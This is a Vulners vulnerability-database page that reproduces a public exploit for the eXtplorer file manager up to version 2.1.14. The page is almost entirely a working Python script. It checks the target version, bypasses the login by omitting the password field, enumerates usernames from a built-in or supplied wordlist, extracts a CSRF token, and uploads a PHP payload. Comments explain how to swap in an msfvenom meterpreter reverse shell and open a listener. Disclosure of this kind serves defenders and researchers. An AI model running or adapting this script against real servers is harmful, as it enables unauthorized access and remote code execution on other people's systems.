Vulners
Lucene search
eXtplorer 2.1.14 Authentication Bypass / Remote Code Execution
`# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)
# Exploit Author: ErPaciocco
# Author Website: https://erpaciocco.github.io
# Vendor Homepage: https://extplorer.net/
#
# Vendor:
# ==============
# extplorer.net
#
# Product:
# ==================
# eXtplorer <= v2.1.14
#
# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
# directories, edit, copy, move, delete,
# search, upload and download files, create & extract archives, create new
# files and directories, change file
# permissions (chmod) and more. It is often used as FTP extension for popular
# applications like Joomla.
#
# Vulnerability Type:
# ======================
# Authentication Bypass (& Remote Command Execution)
#
#
# Vulnerability Details:
# =====================
#
# eXtplorer authentication mechanism allows an attacker
# to login into the Admin Panel without knowing the password
# of the victim, but only its username. This vector is exploited
# by not supplying password in POST request.
#
#
# Tested on Windows
#
#
# Reproduction steps:
# ==================
#
# 1) Navigate to Login Panel
# 2) Intercept authentication POST request to /index.php
# 3) Remove 'password' field
# 4) Send it and enjoy!
#
#
# Exploit code(s):
# ===============
#
# Run below PY script from CLI...
#
# [eXtplorer_auth_bypass.py]
#
# Proof Of Concept
try:
import requests
except:
print(f"ERROR: RUN: pip install requests")
exit()
import sys
import time
import urllib.parse
import re
import random
import string
import socket
import time
import base64
TARGET = None
WORDLIST = None
_BUILTIN_WL = [
'root',
'admin',
'test',
'guest',
'info',
'adm',
'user',
'administrator'
]
_HOST = None
_PATH = None
_SESSION = None
_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive' }
def detect():
global _HOST
global _PATH
global _SESSION
global _HEADERS
_HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]
_PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')
_SESSION = requests.Session()
raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)
if raw.status_code == 200:
ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE)
if int(ver[0][2]) < 15:
return True
return False
def auth_bypass():
global _HOST
global _PATH
global _SESSION
global _HEADERS
global WORDLIST
global _BUILTIN_WL
_HEADERS['X-Requested-With'] = 'XMLHttpRequest'
params = {'option': 'com_extplorer',
'action': 'login',
'type': 'extplorer',
'username': 'admin',
'lang':'english'}
if WORDLIST != None:
if WORDLIST == _BUILTIN_WL:
info(f"Attempting to guess an username from builtin wordlist")
wl = _BUILTIN_WL
else:
info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}")
with open(WORDLIST[0], "r") as f:
wl = f.read().split('\n')
for user in wl:
params = {'option': 'com_extplorer',
'action': 'login',
'type': 'extplorer',
'username': user,
'lang':'english'}
info(f"Trying with {user}")
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
if "successful" in res.text:
return (user)
else:
res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)
if "successful" in res.text:
return ('admin')
return False
def rce():
global _HOST
global _PATH
global _SESSION
global _HEADERS
global _PAYLOAD
tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js")
token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0]
info(f"CSRF Token obtained: {token}")
payload = editPayload()
info(f"Payload edited to fit local parameters")
params = {'option': 'com_extplorer',
'action': 'upload',
'dir': f"./{_PATH}",
'requestType': 'xmlhttprequest',
'confirm':'true',
'token': token}
name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))
files = {'userfile[0]':(f"{name}.php", payload)}
req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)
if "successful" in req.text:
info(f"File {name}.php uploaded in root dir")
info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")
def attack():
if not TARGET:
error("TARGET needed")
if TARGET:
if not detect():
error("eXtplorer vulnerable instance not found!")
exit(1)
else:
info("eXtplorer endpoint is vulnerable!")
username = auth_bypass()
if username:
info("Auth bypassed!")
rce()
else:
error("Username 'admin' not found")
def error(message):
print(f"[E] {message}")
def info(message):
print(f"[I] {message}")
def editPayload():
# You can generate payload with msfvenom and paste below base64 encoded result
# msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64
return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")
def help():
print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution
Usage:
python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]
Options:
-t Target host. Provide target IP address (and optionally port).
-w Wordlist for user enumeration and authentication (Optional)
-wb Use built-in wordlist for user enumeration (Optional)
-h Show this help menu.
""")
return True
args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))),
"w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))),
"wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))),
"h" : (0, lambda *x: (help() and exit(0)))}
if __name__ == "__main__":
i = 1
[
args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ])
for arg in [k
for k in sys.argv[i:]
]
if arg[0] == '-'
]
attack()
else:
help()
# ///////////////////////////////////////////////////////////////////////
# [Script examples]
#
#
# c:\>python eXtplorer_auth_bypass.py -t https://target.com
# c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt
# c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb
# Exploitation Method:
# ======================
# Remote
# [+] Disclaimer
# The information contained within this advisory is supplied "as-is" with no
# warranties or guarantees of fitness of use or otherwise.
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and
# that due credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit
# is given to the author. The author is not responsible for any misuse of the
# information contained herein and accepts no responsibility
# for any damage caused by the use or misuse of this information.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8